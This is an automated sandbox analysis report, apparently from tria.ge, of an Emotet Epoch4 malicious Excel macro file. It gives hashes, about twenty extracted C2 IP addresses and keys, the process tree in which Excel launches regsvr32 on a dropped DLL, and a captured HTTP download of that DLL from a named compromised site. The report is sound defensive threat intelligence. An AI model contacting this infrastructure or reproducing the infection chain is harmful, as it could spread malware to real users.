Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    12/05/2022, 16:28 UTC

General

  • Target

    ?i=1izkympco.xlsm

  • Size

    50KB

  • MD5

    793c5a832ea9b3c4a225bc96b4449bc2

  • SHA1

    168afc78144b659b18b606a26c3e9a6343dd104a

  • SHA256

    894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7

  • SHA512

    df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2

68.183.94.239:80

104.131.11.205:443

138.197.109.175:8080

187.84.80.182:443

79.143.187.147:443

216.158.226.206:443

167.99.115.35:8080

212.24.98.99:8080

1.234.21.73:7080

206.189.28.199:8080

158.69.222.101:443

164.68.99.3:8080

188.44.20.25:443

185.157.82.211:8080

134.122.66.193:8080

196.218.30.83:443

72.15.201.15:8080

5.9.116.246:8080

176.104.106.96:8080

153.126.146.25:7080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\_i=1izkympco.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcdbwthdrbgozm\vdupunehiaz.gxz"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1568

Network

  • flag-us
    DNS
    harleyqueretaro.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    harleyqueretaro.com
    IN A
    Response
    harleyqueretaro.com
    IN A
    63.247.138.144
  • flag-us
    GET
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    EXCEL.EXE
    Remote address:
    63.247.138.144:80
    Request
    GET /renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: harleyqueretaro.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 12 May 2022 16:35:56 GMT
    Server: Apache
    X-Powered-By: PHP/5.6.40
    Set-Cookie: 627d376c429cb=1652373356; expires=Thu, 12-May-2022 16:36:56 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Thu, 12 May 2022 16:35:56 GMT
    Expires: Thu, 12 May 2022 16:35:56 GMT
    Content-Disposition: attachment; filename="illkVUA0aCB42y28qRyvY91Mq6.dll"
    Content-Transfer-Encoding: binary
    Content-Length: 868352
    Connection: close
    Content-Type: application/x-msdownload
  • 63.247.138.144:80
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    http
    EXCEL.EXE
    18.8kB
    895.9kB
    388
    649

    HTTP Request

    GET http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

    HTTP Response

    200
  • 68.183.94.239:80
    regsvr32.exe
    152 B
    120 B
    3
    3
  • 68.183.94.239:80
    regsvr32.exe
    152 B
    120 B
    3
    3
  • 104.131.11.205:443
    regsvr32.exe
    152 B
    3
  • 104.131.11.205:443
    regsvr32.exe
    152 B
    3
  • 138.197.109.175:8080
    regsvr32.exe
    152 B
    3
  • 138.197.109.175:8080
    regsvr32.exe
    152 B
    3
  • 187.84.80.182:443
    regsvr32.exe
    104 B
    2
  • 8.8.8.8:53
    harleyqueretaro.com
    dns
    EXCEL.EXE
    65 B
    81 B
    1
    1

    DNS Request

    harleyqueretaro.com

    DNS Response

    63.247.138.144

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\rulm.dll

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • \Users\Admin\rulm.dll

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • memory/1568-68-0x0000000000290000-0x00000000002B4000-memory.dmp

    Filesize

    144KB

  • memory/1668-54-0x000000002FBE1000-0x000000002FBE4000-memory.dmp

    Filesize

    12KB

  • memory/1668-55-0x0000000071391000-0x0000000071393000-memory.dmp

    Filesize

    8KB

  • memory/1668-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1668-57-0x00000000764C1000-0x00000000764C3000-memory.dmp

    Filesize

    8KB

  • memory/1668-58-0x000000007237D000-0x0000000072388000-memory.dmp

    Filesize

    44KB

  • memory/1804-63-0x0000000000280000-0x00000000002A4000-memory.dmp

    Filesize

    144KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.